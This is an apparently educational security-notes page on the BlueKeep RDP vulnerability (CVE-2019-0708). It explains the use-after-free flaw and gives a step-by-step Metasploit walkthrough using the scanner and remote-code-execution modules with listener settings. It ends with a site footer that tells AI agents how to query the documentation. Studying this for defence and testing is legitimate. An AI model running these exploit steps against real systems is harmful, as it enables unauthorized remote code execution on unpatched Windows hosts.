# CVE-2019-0708: BlueKeep

{% embed url="<https://www.cisa.gov/news-events/cybersecurity-advisories/aa19-168a>" %}

{% embed url="<https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2019-0708>" %}

BlueKeep is a critical RDP vulnerability in Windows systems that allows attackers to remotely execute arbitrary code without authentication, potentially gaining full access to the system and network. Disclosed by Microsoft in May 2019, the exploit targets the RDP protocol, exploiting a flaw in kernel memory. A patch was released on May 14, 2019, but many systems, including Windows XP, Vista, 7, and Server 2008 R2, remained vulnerable at the time. Over 1 million systems worldwide were at risk when the vulnerability was discovered.

{% embed url="<https://nvd.nist.gov/vuln/detail/cve-2019-0708>" %}

## **Why the Vulnerability Occurs**

The vulnerability in question affects Microsoft’s Remote Desktop Services (formerly Terminal Services), which allows users to remotely access a Windows system using the Remote Desktop Protocol (RDP) over port 3389/TCP. The exploit leverages a flaw in the "MCS Connect Initial and GCC Create" request, part of the RDP connection sequence. Specifically, it targets the creation of virtual channels, where a use-after-free vulnerability in the RDP kernel driver (termdd.sys) can be exploited by sending crafted data to the "MS\_T120" channel. This results in arbitrary code execution with administrative privileges.

{% embed url="<https://www.zerodayinitiative.com/blog/2019/5/27/cve-2019-0708-a-comprehensive-analysis-of-a-remote-desktop-services-vulnerability>" %}

## Exploitation

### MSF

{% code overflow="wrap" %}

```bash
# enumeration with nmap
sudo nmap -Pn -sV -O [IP]

# vulnerability scan
msfconsole -q
search bluekeep
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set RHOSTS [IP]
run

# exploitation (only works in x64)
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
show options
set RHOSTS [IP]
set LHOST [Listening IP]
set LPORT [Listening Port]
# Exploit may fail for Bad Config. Manually configure targets.
show targets 
select target [target name]
run
```

{% endcode %}

### Others

{% embed url="<https://github.com/Ekultek/BlueKeep/tree/master>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://security.navidnaf.com/flaws-w-magical-frameworks/windows/cve-2019-0708-bluekeep.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.